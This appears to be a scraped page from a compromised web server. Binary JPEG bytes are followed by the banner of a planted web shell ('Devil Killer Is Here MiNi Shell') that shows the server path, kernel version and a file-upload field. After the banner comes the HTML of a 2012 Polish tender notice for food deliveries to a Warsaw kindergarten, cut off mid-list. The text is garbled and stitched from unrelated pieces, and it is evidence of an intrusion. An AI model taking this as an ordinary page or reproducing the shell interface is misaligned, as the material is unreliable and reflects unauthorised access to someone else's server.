JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/464274-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 9 pakietów.</b><br>
<b>Numer ogłoszenia: 464274 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 14 , ul. Senatorska 24, 00-095 Warszawa, woj. mazowieckie, tel. 22 827 02 40, faks 22 827 02 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p14w-wa.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów- zgodnie z SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.51.00.00-6, 15.53.00.00-2, 03.22.00.00-9, 03.14.25.00-3, 15.10.00.00-9, 15.13.11.30-5, 03.31.10.00-2, 15.89.60.00-5, 15.80.00.00-6, 41.11.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p14w-wa.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr.14 ul.Senatorska 24a, 00-095 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 10:00, miejsce: Przedszkole Nr.14 ul.Senatorska 24a, 00-095 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb biały, duży krojony masa netto 580g,szt.720;chleb razowy z ziarnem-masa netto 500g,świeży szt.250;chleb razowy masa 500g,świeży szt.250;chleb tostowy pszenny lub z ziarnem,szt.150;chałka masa netto 300g.,świeża szt.80;bułka wrocławska masa netto 280g, świeża szt.1400;bułki pszenne(kajzerki)-45g, świeże szt.700;groszek ptysiowy-masa netto 250g-5kg;drożdżówka -rogalik masa netto 55g,świeża szt.1920;drożdżówka z budyniem masa netto 80g,świeża szt.540;drożdżówka jogurtowa lub z owocami masa netto 80g,świeża szt.540;wyroby cukiernicze na wagę masa netto-15kg; ciasto drożdżowe-masa netto 350g -40kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napój z mleka fermentowanego z żywymi kulturami bakterii,owocowy,opakowanie-but.100ml szt.8500; jogurt owocowy-kawałki owoców na dole,kremowy jogurt na górze-op.kubek prostokątny 125g,szt.2000;serek wzbogacony o witaminę d,op.kubek 50g,szt.2000;puszysty serek do smarowania op.kubek 150g,szt.100;jogurt naturalny gęsty-op.3l,szt.30;masło exstra o zaw.tłuszczu 82% bez dodatku tłuszczów roślinnych-op.folia aluminiowa z nadrukiem 200g,szt.2000;masło roślinne,op.kubek 250g szt.40;mleko spożywcze,pasteryzowane,homogenizowane-zaw.tłuszczu3,2%op.folia 1l-w tym 1/2 ilości dotowanego Programu Agencji Rynku Rolnego szklanka mleka  5000l.;ser topiony kremowy-40%tłuszczu w 100g-prostokątny,szt.200; ser żółty łagodny,zaw.tłuszczu 45%,sera w serze 90%,dotowany z Programu Agencji Rynku Rolnego Szklanka Mleka 110kg;śmietanka do ciast i deserów 30%tłuszczu,wart.energetyczna w 100g produktu 290kalorii,składnik dodatkowy:stabilizator-karaden,op.kartonik 500ml, szt.40;śmietana do zupy, zaw tłuszczu 18%, op.kubek 400ml.szt.360; twaróg półtłusty kl.I,zaw.tłuszczu 3,5 %-op.folia o poj.250g,120kg;ser topiony plastry kl.I -do 40%tłuszczu,op.150g szt.80;mleko smakowe w kartoniku ze słomką,op.200ml,szt.50;ser pleśniowy łagodny 120g, szt.50;ser mozarella 125g.szt.50;margaryna 250g, szt.20;śmietana zaw.tłuszczu 18%,op.kartonowe poj0,5l, szt.10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz-kl.I lub II wg.rozporz.komisji(WE1093/97)kg.200;ananas świeży kl.I szt.50;borówka amerykańska kl.I 300kg;banan kl.I lub II,wg.rozporz.komisji(WE2257/94)1400kg.;botwina w pęczkach,świeża,sprężysta,bez śladów nadpsucia, szt.50;brokuły,świeże, o różyczkach zwartych intensywnie zielonych,bez pleśni i nadpsucia szt.144; brzoskwinie lub morele-dojrzałe,nie przejrzałe bez śladów nadpsucia i obicia kl.I, 200kg.;buraki-czerwone,okrągłe,konsumpcyjne wielkość średnia 300kg.;cebula zwyczajna-wielkość średnia 250kg.;cytryny,soczyste o gładkiej skórce bez śladów nadpsucia kl.I 150kg,cukinia zielona młoda,świeża bez cech nadpsucia kl.I -100kg.;czosnek,duże główki o lekko fioletowym zabarwieniu, świeży bez cech nadpsucia 50szt.,fasolka szparagowa żółta,długa bez łyka i śladów nadpsucia 40kg.;gruszki-soczyste kl.I bez cech nadpsucia 350kg.;jabłko soczyste-słodkie nie obite kl.I-bez cech nadpsucia,1000kg.;kalafior świeży,różyczki białe,zwarta 160szt.;kapusta czerwona-główka zdrowa bez cech nadpsucia 30kg.;kapusta kiszona-jasna,nie przekwaszona o zapachu delikatnym,op.wiaderko plastikowe5kg.,200kg.;kapusta pekińska-główka zdrowa bez cech nadpsucia,350kg.;kapusta włoska-główka bez cech nadpsucia, 170kg.; kiwi -sztuki,twarde dojrzałe bez cech nadpsucia kl.I 1100szt.;koper zielony-pęczki,świeży,nie zwiędły o wadze określonej sezonowo,bez cech nadpsucia,300szt.;
mandarynki bezpestkowe,soczyste nie wyschnięte,skórka gładka,łatwo odchodząca,zdrowe,bez cech nadpsucia 600 kg.;melon żółty kl.I-zdrowy,bez cech nadpsucia 300kg,marchew młoda,karotka,umyta bez cech nadpsucia,średniej wielkości 1000kg.;natka pietruszki świeża,pęczki nie zwiędłe o wadze określonej sezonowo,bez cech nadpsucia szt.250;nektarynki -dojrzałe,średniej wielkości,nie obite kl.I bez cech nadpsucia i pleśni 300szt.;ogórki kiszone,nie przekwaszone,twarde bez cech nadpsucia,op.wiaderko plasikowe6kg,300kg;ogórki świeże-krótkie lub węże,szklarniowe lub gruntowe-w zależności od sezonu,twarde,zdrowe bez cech nadpsucia kl.I 200kg.;papryka czerwona-dojrzała,świeża,jędrna bez cech nadpsucia kl.I 150 kg.;pietruszka zdrowy korzeń bez brązowych przebarwień-jędrna,umyta bez cech nadpsucia 300kg.;pieczarki świeże bez plam i cech nadpsucia kl.I 80kg.;pomarańcza bezpestkowa,gładka,jasna cienka skórka bez cech nadpsucia kl.I-200kg.;pomidor-mięsisty,świeży produkt polski-bez cech nadpsucia kl.I op.6kg-400kg.;por zdrowy,zwarty bez cech nadpsucia 200kg.;rzodkiewka-pęczki czerwona,młoda,świeża,twarda bez cech nadpsucia 300szt.;sałata świeża,intensywnie zielona 300szt.sałata lodowa świeża bez cech nadpsucia 100szt.;seler biały,umyty wielkość średnia-bez cech nadpsucia 300kg.;szaron(kaki)dojrzały bez cech nadpsucia 250szt.;szczypior z małą cebulką(dymka)pęczki wielkość sezonowa bez cech nadpsucia sprężysty 100szt.;szczypiorek cienki pęczki,wielkość sezonowa bez cech nadpsucia sprężysty 200szt.;śliwki drobne wybarwione dojrzałości konsumpcyjnej odchodząca od pestki bez cech nadpsucia 200kg.;truskawka odmiana konsumpcyjna-polska zdrowa,dojrzała, wybarwiona bez cech nadpsucia 200kg.;winogrono ciemne-kiście zagraniczne-słodkie,bez pleśni i cech nadpsucia kl.I 50kg.;winogrono jasne-kiście zagraniczne-słodkie,bez pleśni i cech nadpsucia kl.I 700kg.;ziemniaki młode konsumpcyjne,umyte, zdrowe, nie nadmrożone skórka bez zielonych zabarwień,bez oczek,wielkość średnia bez cech nadpsucia 5000kg.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja świeże, nie starsze niż 7 dni od daty pakowania, o oznaczeniu:3-jaja z chowu klatkowego, A,L-duże 63-73g. 4000szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MIĘSO I WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z indyka w przedziale wagowym 1kg-1,5kg-świeży bez skóry,bez kości-nie rozmrażany 100kg.;udziec z indyka bez skóry i kości,świeży nie rozmrażany 50-70dkg.,100kg.;piersi z kurczaka świeże nie rozmrażane,pojedyncze 100kg.;kurczak świeży,cały,patroszony 1,5-2kg.nie rozmrażany. 60kg.;udka z kurczaka świeże,nie rozmrażane 120kg.;cielęcina zadnia,świeża, nie rozmrażana kawałki 1-1,5kg.-50kg.;łopatka wołowa z młodych sztuk,bez skóry,bez kości,bez wierzchniej warstwy tłuszczu,świeże nie rozmrażane kawałki po 1-1,5kg. 100kg.;szynka wieprzowa bez kości,bez tłuszczu kawałki o wielkości 1-1,5 kg,świeże nie rozmrażane,150kg.; łopatka wieprzowa bez kości,bez tłuszczu kawałki o wielkości 1-1,5 kg,świeże nie rozmrażane,200kg.;schab środkowy bez kości o średnicy nie większej niż 10cm, świeży,nie rozmrażany kawałki 1,5-2 kg.200kg.;wołowe z udźca bez kości kl.I świeże,nie rozmrażane z młodych sztuk 1-1,5kg.130 kg.;porcje rosołowe 150kg.;skrzydła z indyka świeże kl.I 150kg.;polędwica sopocka,wysoko wydajna, mięso wieprzowe 74%-100kg.;kiełbasa krakowska parzona,grubo rozdrobniona, wysokowydajna mięso wieprzowe 70-90% 60kg.;kiełbasa krakowska podsuszana grubo rozdrobniona, wysokowydajna mięso wieprzowe 96% - 60kg.;kiełbasa żywiecka,średnio rozdrobniona,podsuszana,wędzona 100g gotowego produktu uzyskano ze 121g mięsa wieprzowego- 60kg.;szynka wiejska,wędzona,parzona,mięso wieprzowe 83% - 80kg.;kiełbasa cienka wieprzowa 84,9% mięso wieprzowe 50kg.;kabanosy kiełbasa średni rozdrobniona, wędzona,parzona, podsuszana 100g.gotowego wyrobu uzyskano z 97g,mięsa wieprzowego i 18g mięsa drobiowego -60kg.;salami-mięso wieprzowe 64%,mięso wołowe 32%, 60kg.;parówki wieprzowe odtłuszczone mieso wieprzowe 60%,mięso drobiowe 3% 250kg.;wyroby drobiowe (szynka,polędwica)-produkt blokowy grubo rozdrobniony,mięso z indyka 72,5%-150kg.,pasztet tradycyjny domowy- 30kg.,szynka wieprzowa 78%mięsa wieprzowego - 80kg.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dorsz plamiak-płaty nie więcej niż 3% glazury technologicznej, op.SHP 150kg., mintaj płaty nie więcej niż 3% glazury technologicznej, op.SHP 150kg;makrela wędzona świeża-duże tuszki,zapakowana hermetycznie 35kg.;łosoś wędzony na zimno plastrowany zapakowany na tacce(próżnia)masa 100g.-100szt.;tuńczyk w sosie własnym jasne mięso,duże kawałki.op.puszka min.170g.-50szt.;kostka rybna z mintaja panierowane kl.I 75g.- 50kg.; paluszki rybne panierowane kl.I -40kg.; karp płaty bez ości, ze skórą, kl.I -20kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mrożone-op.torba foliowa o poj.2500g.-100kg.;brukselka mrożona-op.torba foliowa o poj.2500g.-100kg.;fasolka szparagowa zielona mrożona-op.torba foliowa o poj.2500g.-50kg.;fasolka szparagowa żółta mrożona-op.torba foliowa o poj.2500g.-50kg.;kalafior mrożony różyczki-op.torba foliowa o poj.2500g.-100kg.;marchewka z groszkiem mrożona-op.torba foliowa o poj.2500g.-50kg.;marchewka kostka mrożona-op.torba foliowa o poj.2500g.-40kg.;marchewka mini mrożona-op.torba foliowa o poj.2500g.-100kg.;mieszanka kompotowa mrożona-op.torba foliowa o poj.2500g.-200kg.;mieszanka warzywna(kalafior,brokuły,marchew)mrożona-op.torba foliowa o poj.2500g.-100kg.;porzeczka czarna mrożona-op.torba foliowa o poj.2500g.-20kg.;truskawka mrożona-op.torba foliowa o poj.2500g.-80kg.;maliny mrożona-op.torba foliowa o poj.2500g.-20kg.;frytki beztłuszczowe mrożone-op.torba foliowa o poj.2500g.-40kg.;groszek zielony mrożony-op.torba foliowa o poj.2500g.-10kg.;buraki wiórki tarte-mrożone-op.torba foliowa o poj.500g.-60kg.;szpinak liście krojone mrożona-op.torba foliowa o poj.2500g.-60kg.;lody śmietankowe - kubek 120ml.-300szt.; lody czekoladowe-op.1kg,k 30kg.; mieszanka chińska bez ryżu mrożona-op.torba foliowa o poj.2500g.-30kg.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.55.50.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ANANAS KAWAŁKI W LEKKIM SYROPIE puszka 580g-100szt.;ananas plastry w lekkim syropie op.puszka 3035g 50szt.,wafelek z nadzieniem mlecznym w czekoladzie op.37g.200szt.;bazylia suszona,ziele suszone otarte op.10g.-30szt.;biszkopty op.140g.-250szt.;budyń waniliowy z cukrem szt.150;bułka tarta op.450g -144kg.;brzoskwinie połowki w lekkim syropie op.2600g.50szt.;ciasteczka w kształcie misia z nadzieniem 300szt.;cukier puder op.500g -10kg.;cukier biały paczkowany 1kg.,drobny kryształ-500kg.;cukier waniliowy 15g. -60 szt.;dżem truskawkowy nisko słodzony wsad owocowy 40g owoców na 100g.produktu op.słoik300g. -150szt.;dżem wiśniowy nisko słodzony wsad owocowy 40g owoców na 100g.produktu op.słoik300g. -100szt.;fasola biała drobna op.3kg - 30kg.;groch łuskany połówki op.3kg.-30kg.;herbata ziołowa-mięta op.20 torebek*2g -50szt.,herbata owocowa op.20 tor.*2g -50szt.,herbata czarna expresowa op.100 tor.*2g. -8szt.,herbatniki -tradycyjna receptura op.100g -300szt.;kawa rozpuszczalna zbożowa op.150g - 40szt.;kakao rozpuszczalne z witaminami op.600g.- 50szt.; kasza gryczana prażona cała op.0,9 kg - 40kg.;kasza jęczmienna prerłowa biała, łamana drobna op.3kg.-40kg.;kasza manna op.1kg - 25kg.;kasza pęczak biały op.0,9 kg- 30kg.;kasza kuskus - 20kg.;ketchup łagodny op.1000g.-25szt.;kisiel z cukrem różne smaki op.1,3 -15 szt.;koncentrat pomidorowy 30% +/- 2%, op.słoik 950g. 100szt.;krem do smarowania z orzechami laskowymi zaw.13% op.słoik 500g.- wartość energetyczna w 100g produktu 530 cal., białka 6,4- 40szt.;kukurydza konserwowa puszka 340g,po odsączeniu masa netto 280g.-100szt.;kwasek cytrynowy 20g.-25szt.;liść laurowy-ziele suche op.6g - 80szt.;majeranek-ziele suche otarte op,8g -100szt.; majonez dekoracyjny op.słoik 600ml. 80szt.;makaron nitki nr.2 op.0,5 kg. - 75kg.;makaron spaghetti nr.4 op.0,5 - 70kg.;makron świderki nr.19 op.0,5kg - 60 kg.;mąka pszenna typ.480 op.1 kg.-350 kg.;mąka ziemniaczana 1kg.-20kg.;miód naturalny pszczeli op.słoik 400g, wartość energetyczna w 100g.produktu 133kj/319kcal - 100szt.;napój herbaciany 1,3 kg -20 szt.;musztarda op.1l -80szt.;olej rafinowany, rzepakowy z pierwszego tłoczenia op.1l - 200szt.;oliwa z oliwek z pierwszego tłoczenia na zimno op.butelka szklana 500ml.-10szt.;owoce suszone(rodzynki,morele, śliwki i inne)-40kg.;papryka konserwowa op.słoik 720g - 40szt.;pieprz czarny,mielony,naturalny op.20g.-80szt.;płatki  do mleka-kwadraciki z pełnego ziarna pszenicy o smaku cynamonowym op.500g wartość energ.w 100g. produktu 412kcal.,zawartość mąki pszennej pełnoziarnistej 31,1%,substancje wzbogacające:witamina c,niacyna,kwas pantotenowy,wit.z grupy B,żelazo zredukowane,węglan wapnia - 30szt.;płatki do mleka-zbożowe kółeczka z miodem op.500gwartość energ.w 100g. produktu 369kcal.zawartość mąk pełnoziarnistych 64,6%,miodu 4,1% -30szt.;płatki do mleka,zbożowe kulki o smaku czekoladowym wartość energ.w 100g. produktu 379kcal.,zawartość mąki 63%,kakao5,6%,kakao o obniżonej zaw tłuszczu 0,5% - 30szt.;płatki owsiane górskie błyskawiczne -op.400g.-zaw.energetyczna w 100g produktu 366kcal.węglowodany przyswajalne 62,4g - 60; ryż biały długoziarnisty,op.torba papierowa 1kg. wartość energ.w 100g produktu 344kcal.-100 kg.; sok malinowy zagęszczony poj.but.szklanej 420ml.bez konserwantów,pasteryzowany -100szt.;sok owocowy nie przecierowy)jabłka,pomarańcze,ananasy,winogrona, cytryna,gruszki,nektarynki,mango,morele)op.but.1 l- 300szt.;sok przecierowy na bazie marchwi i owoców o poj.1 l. 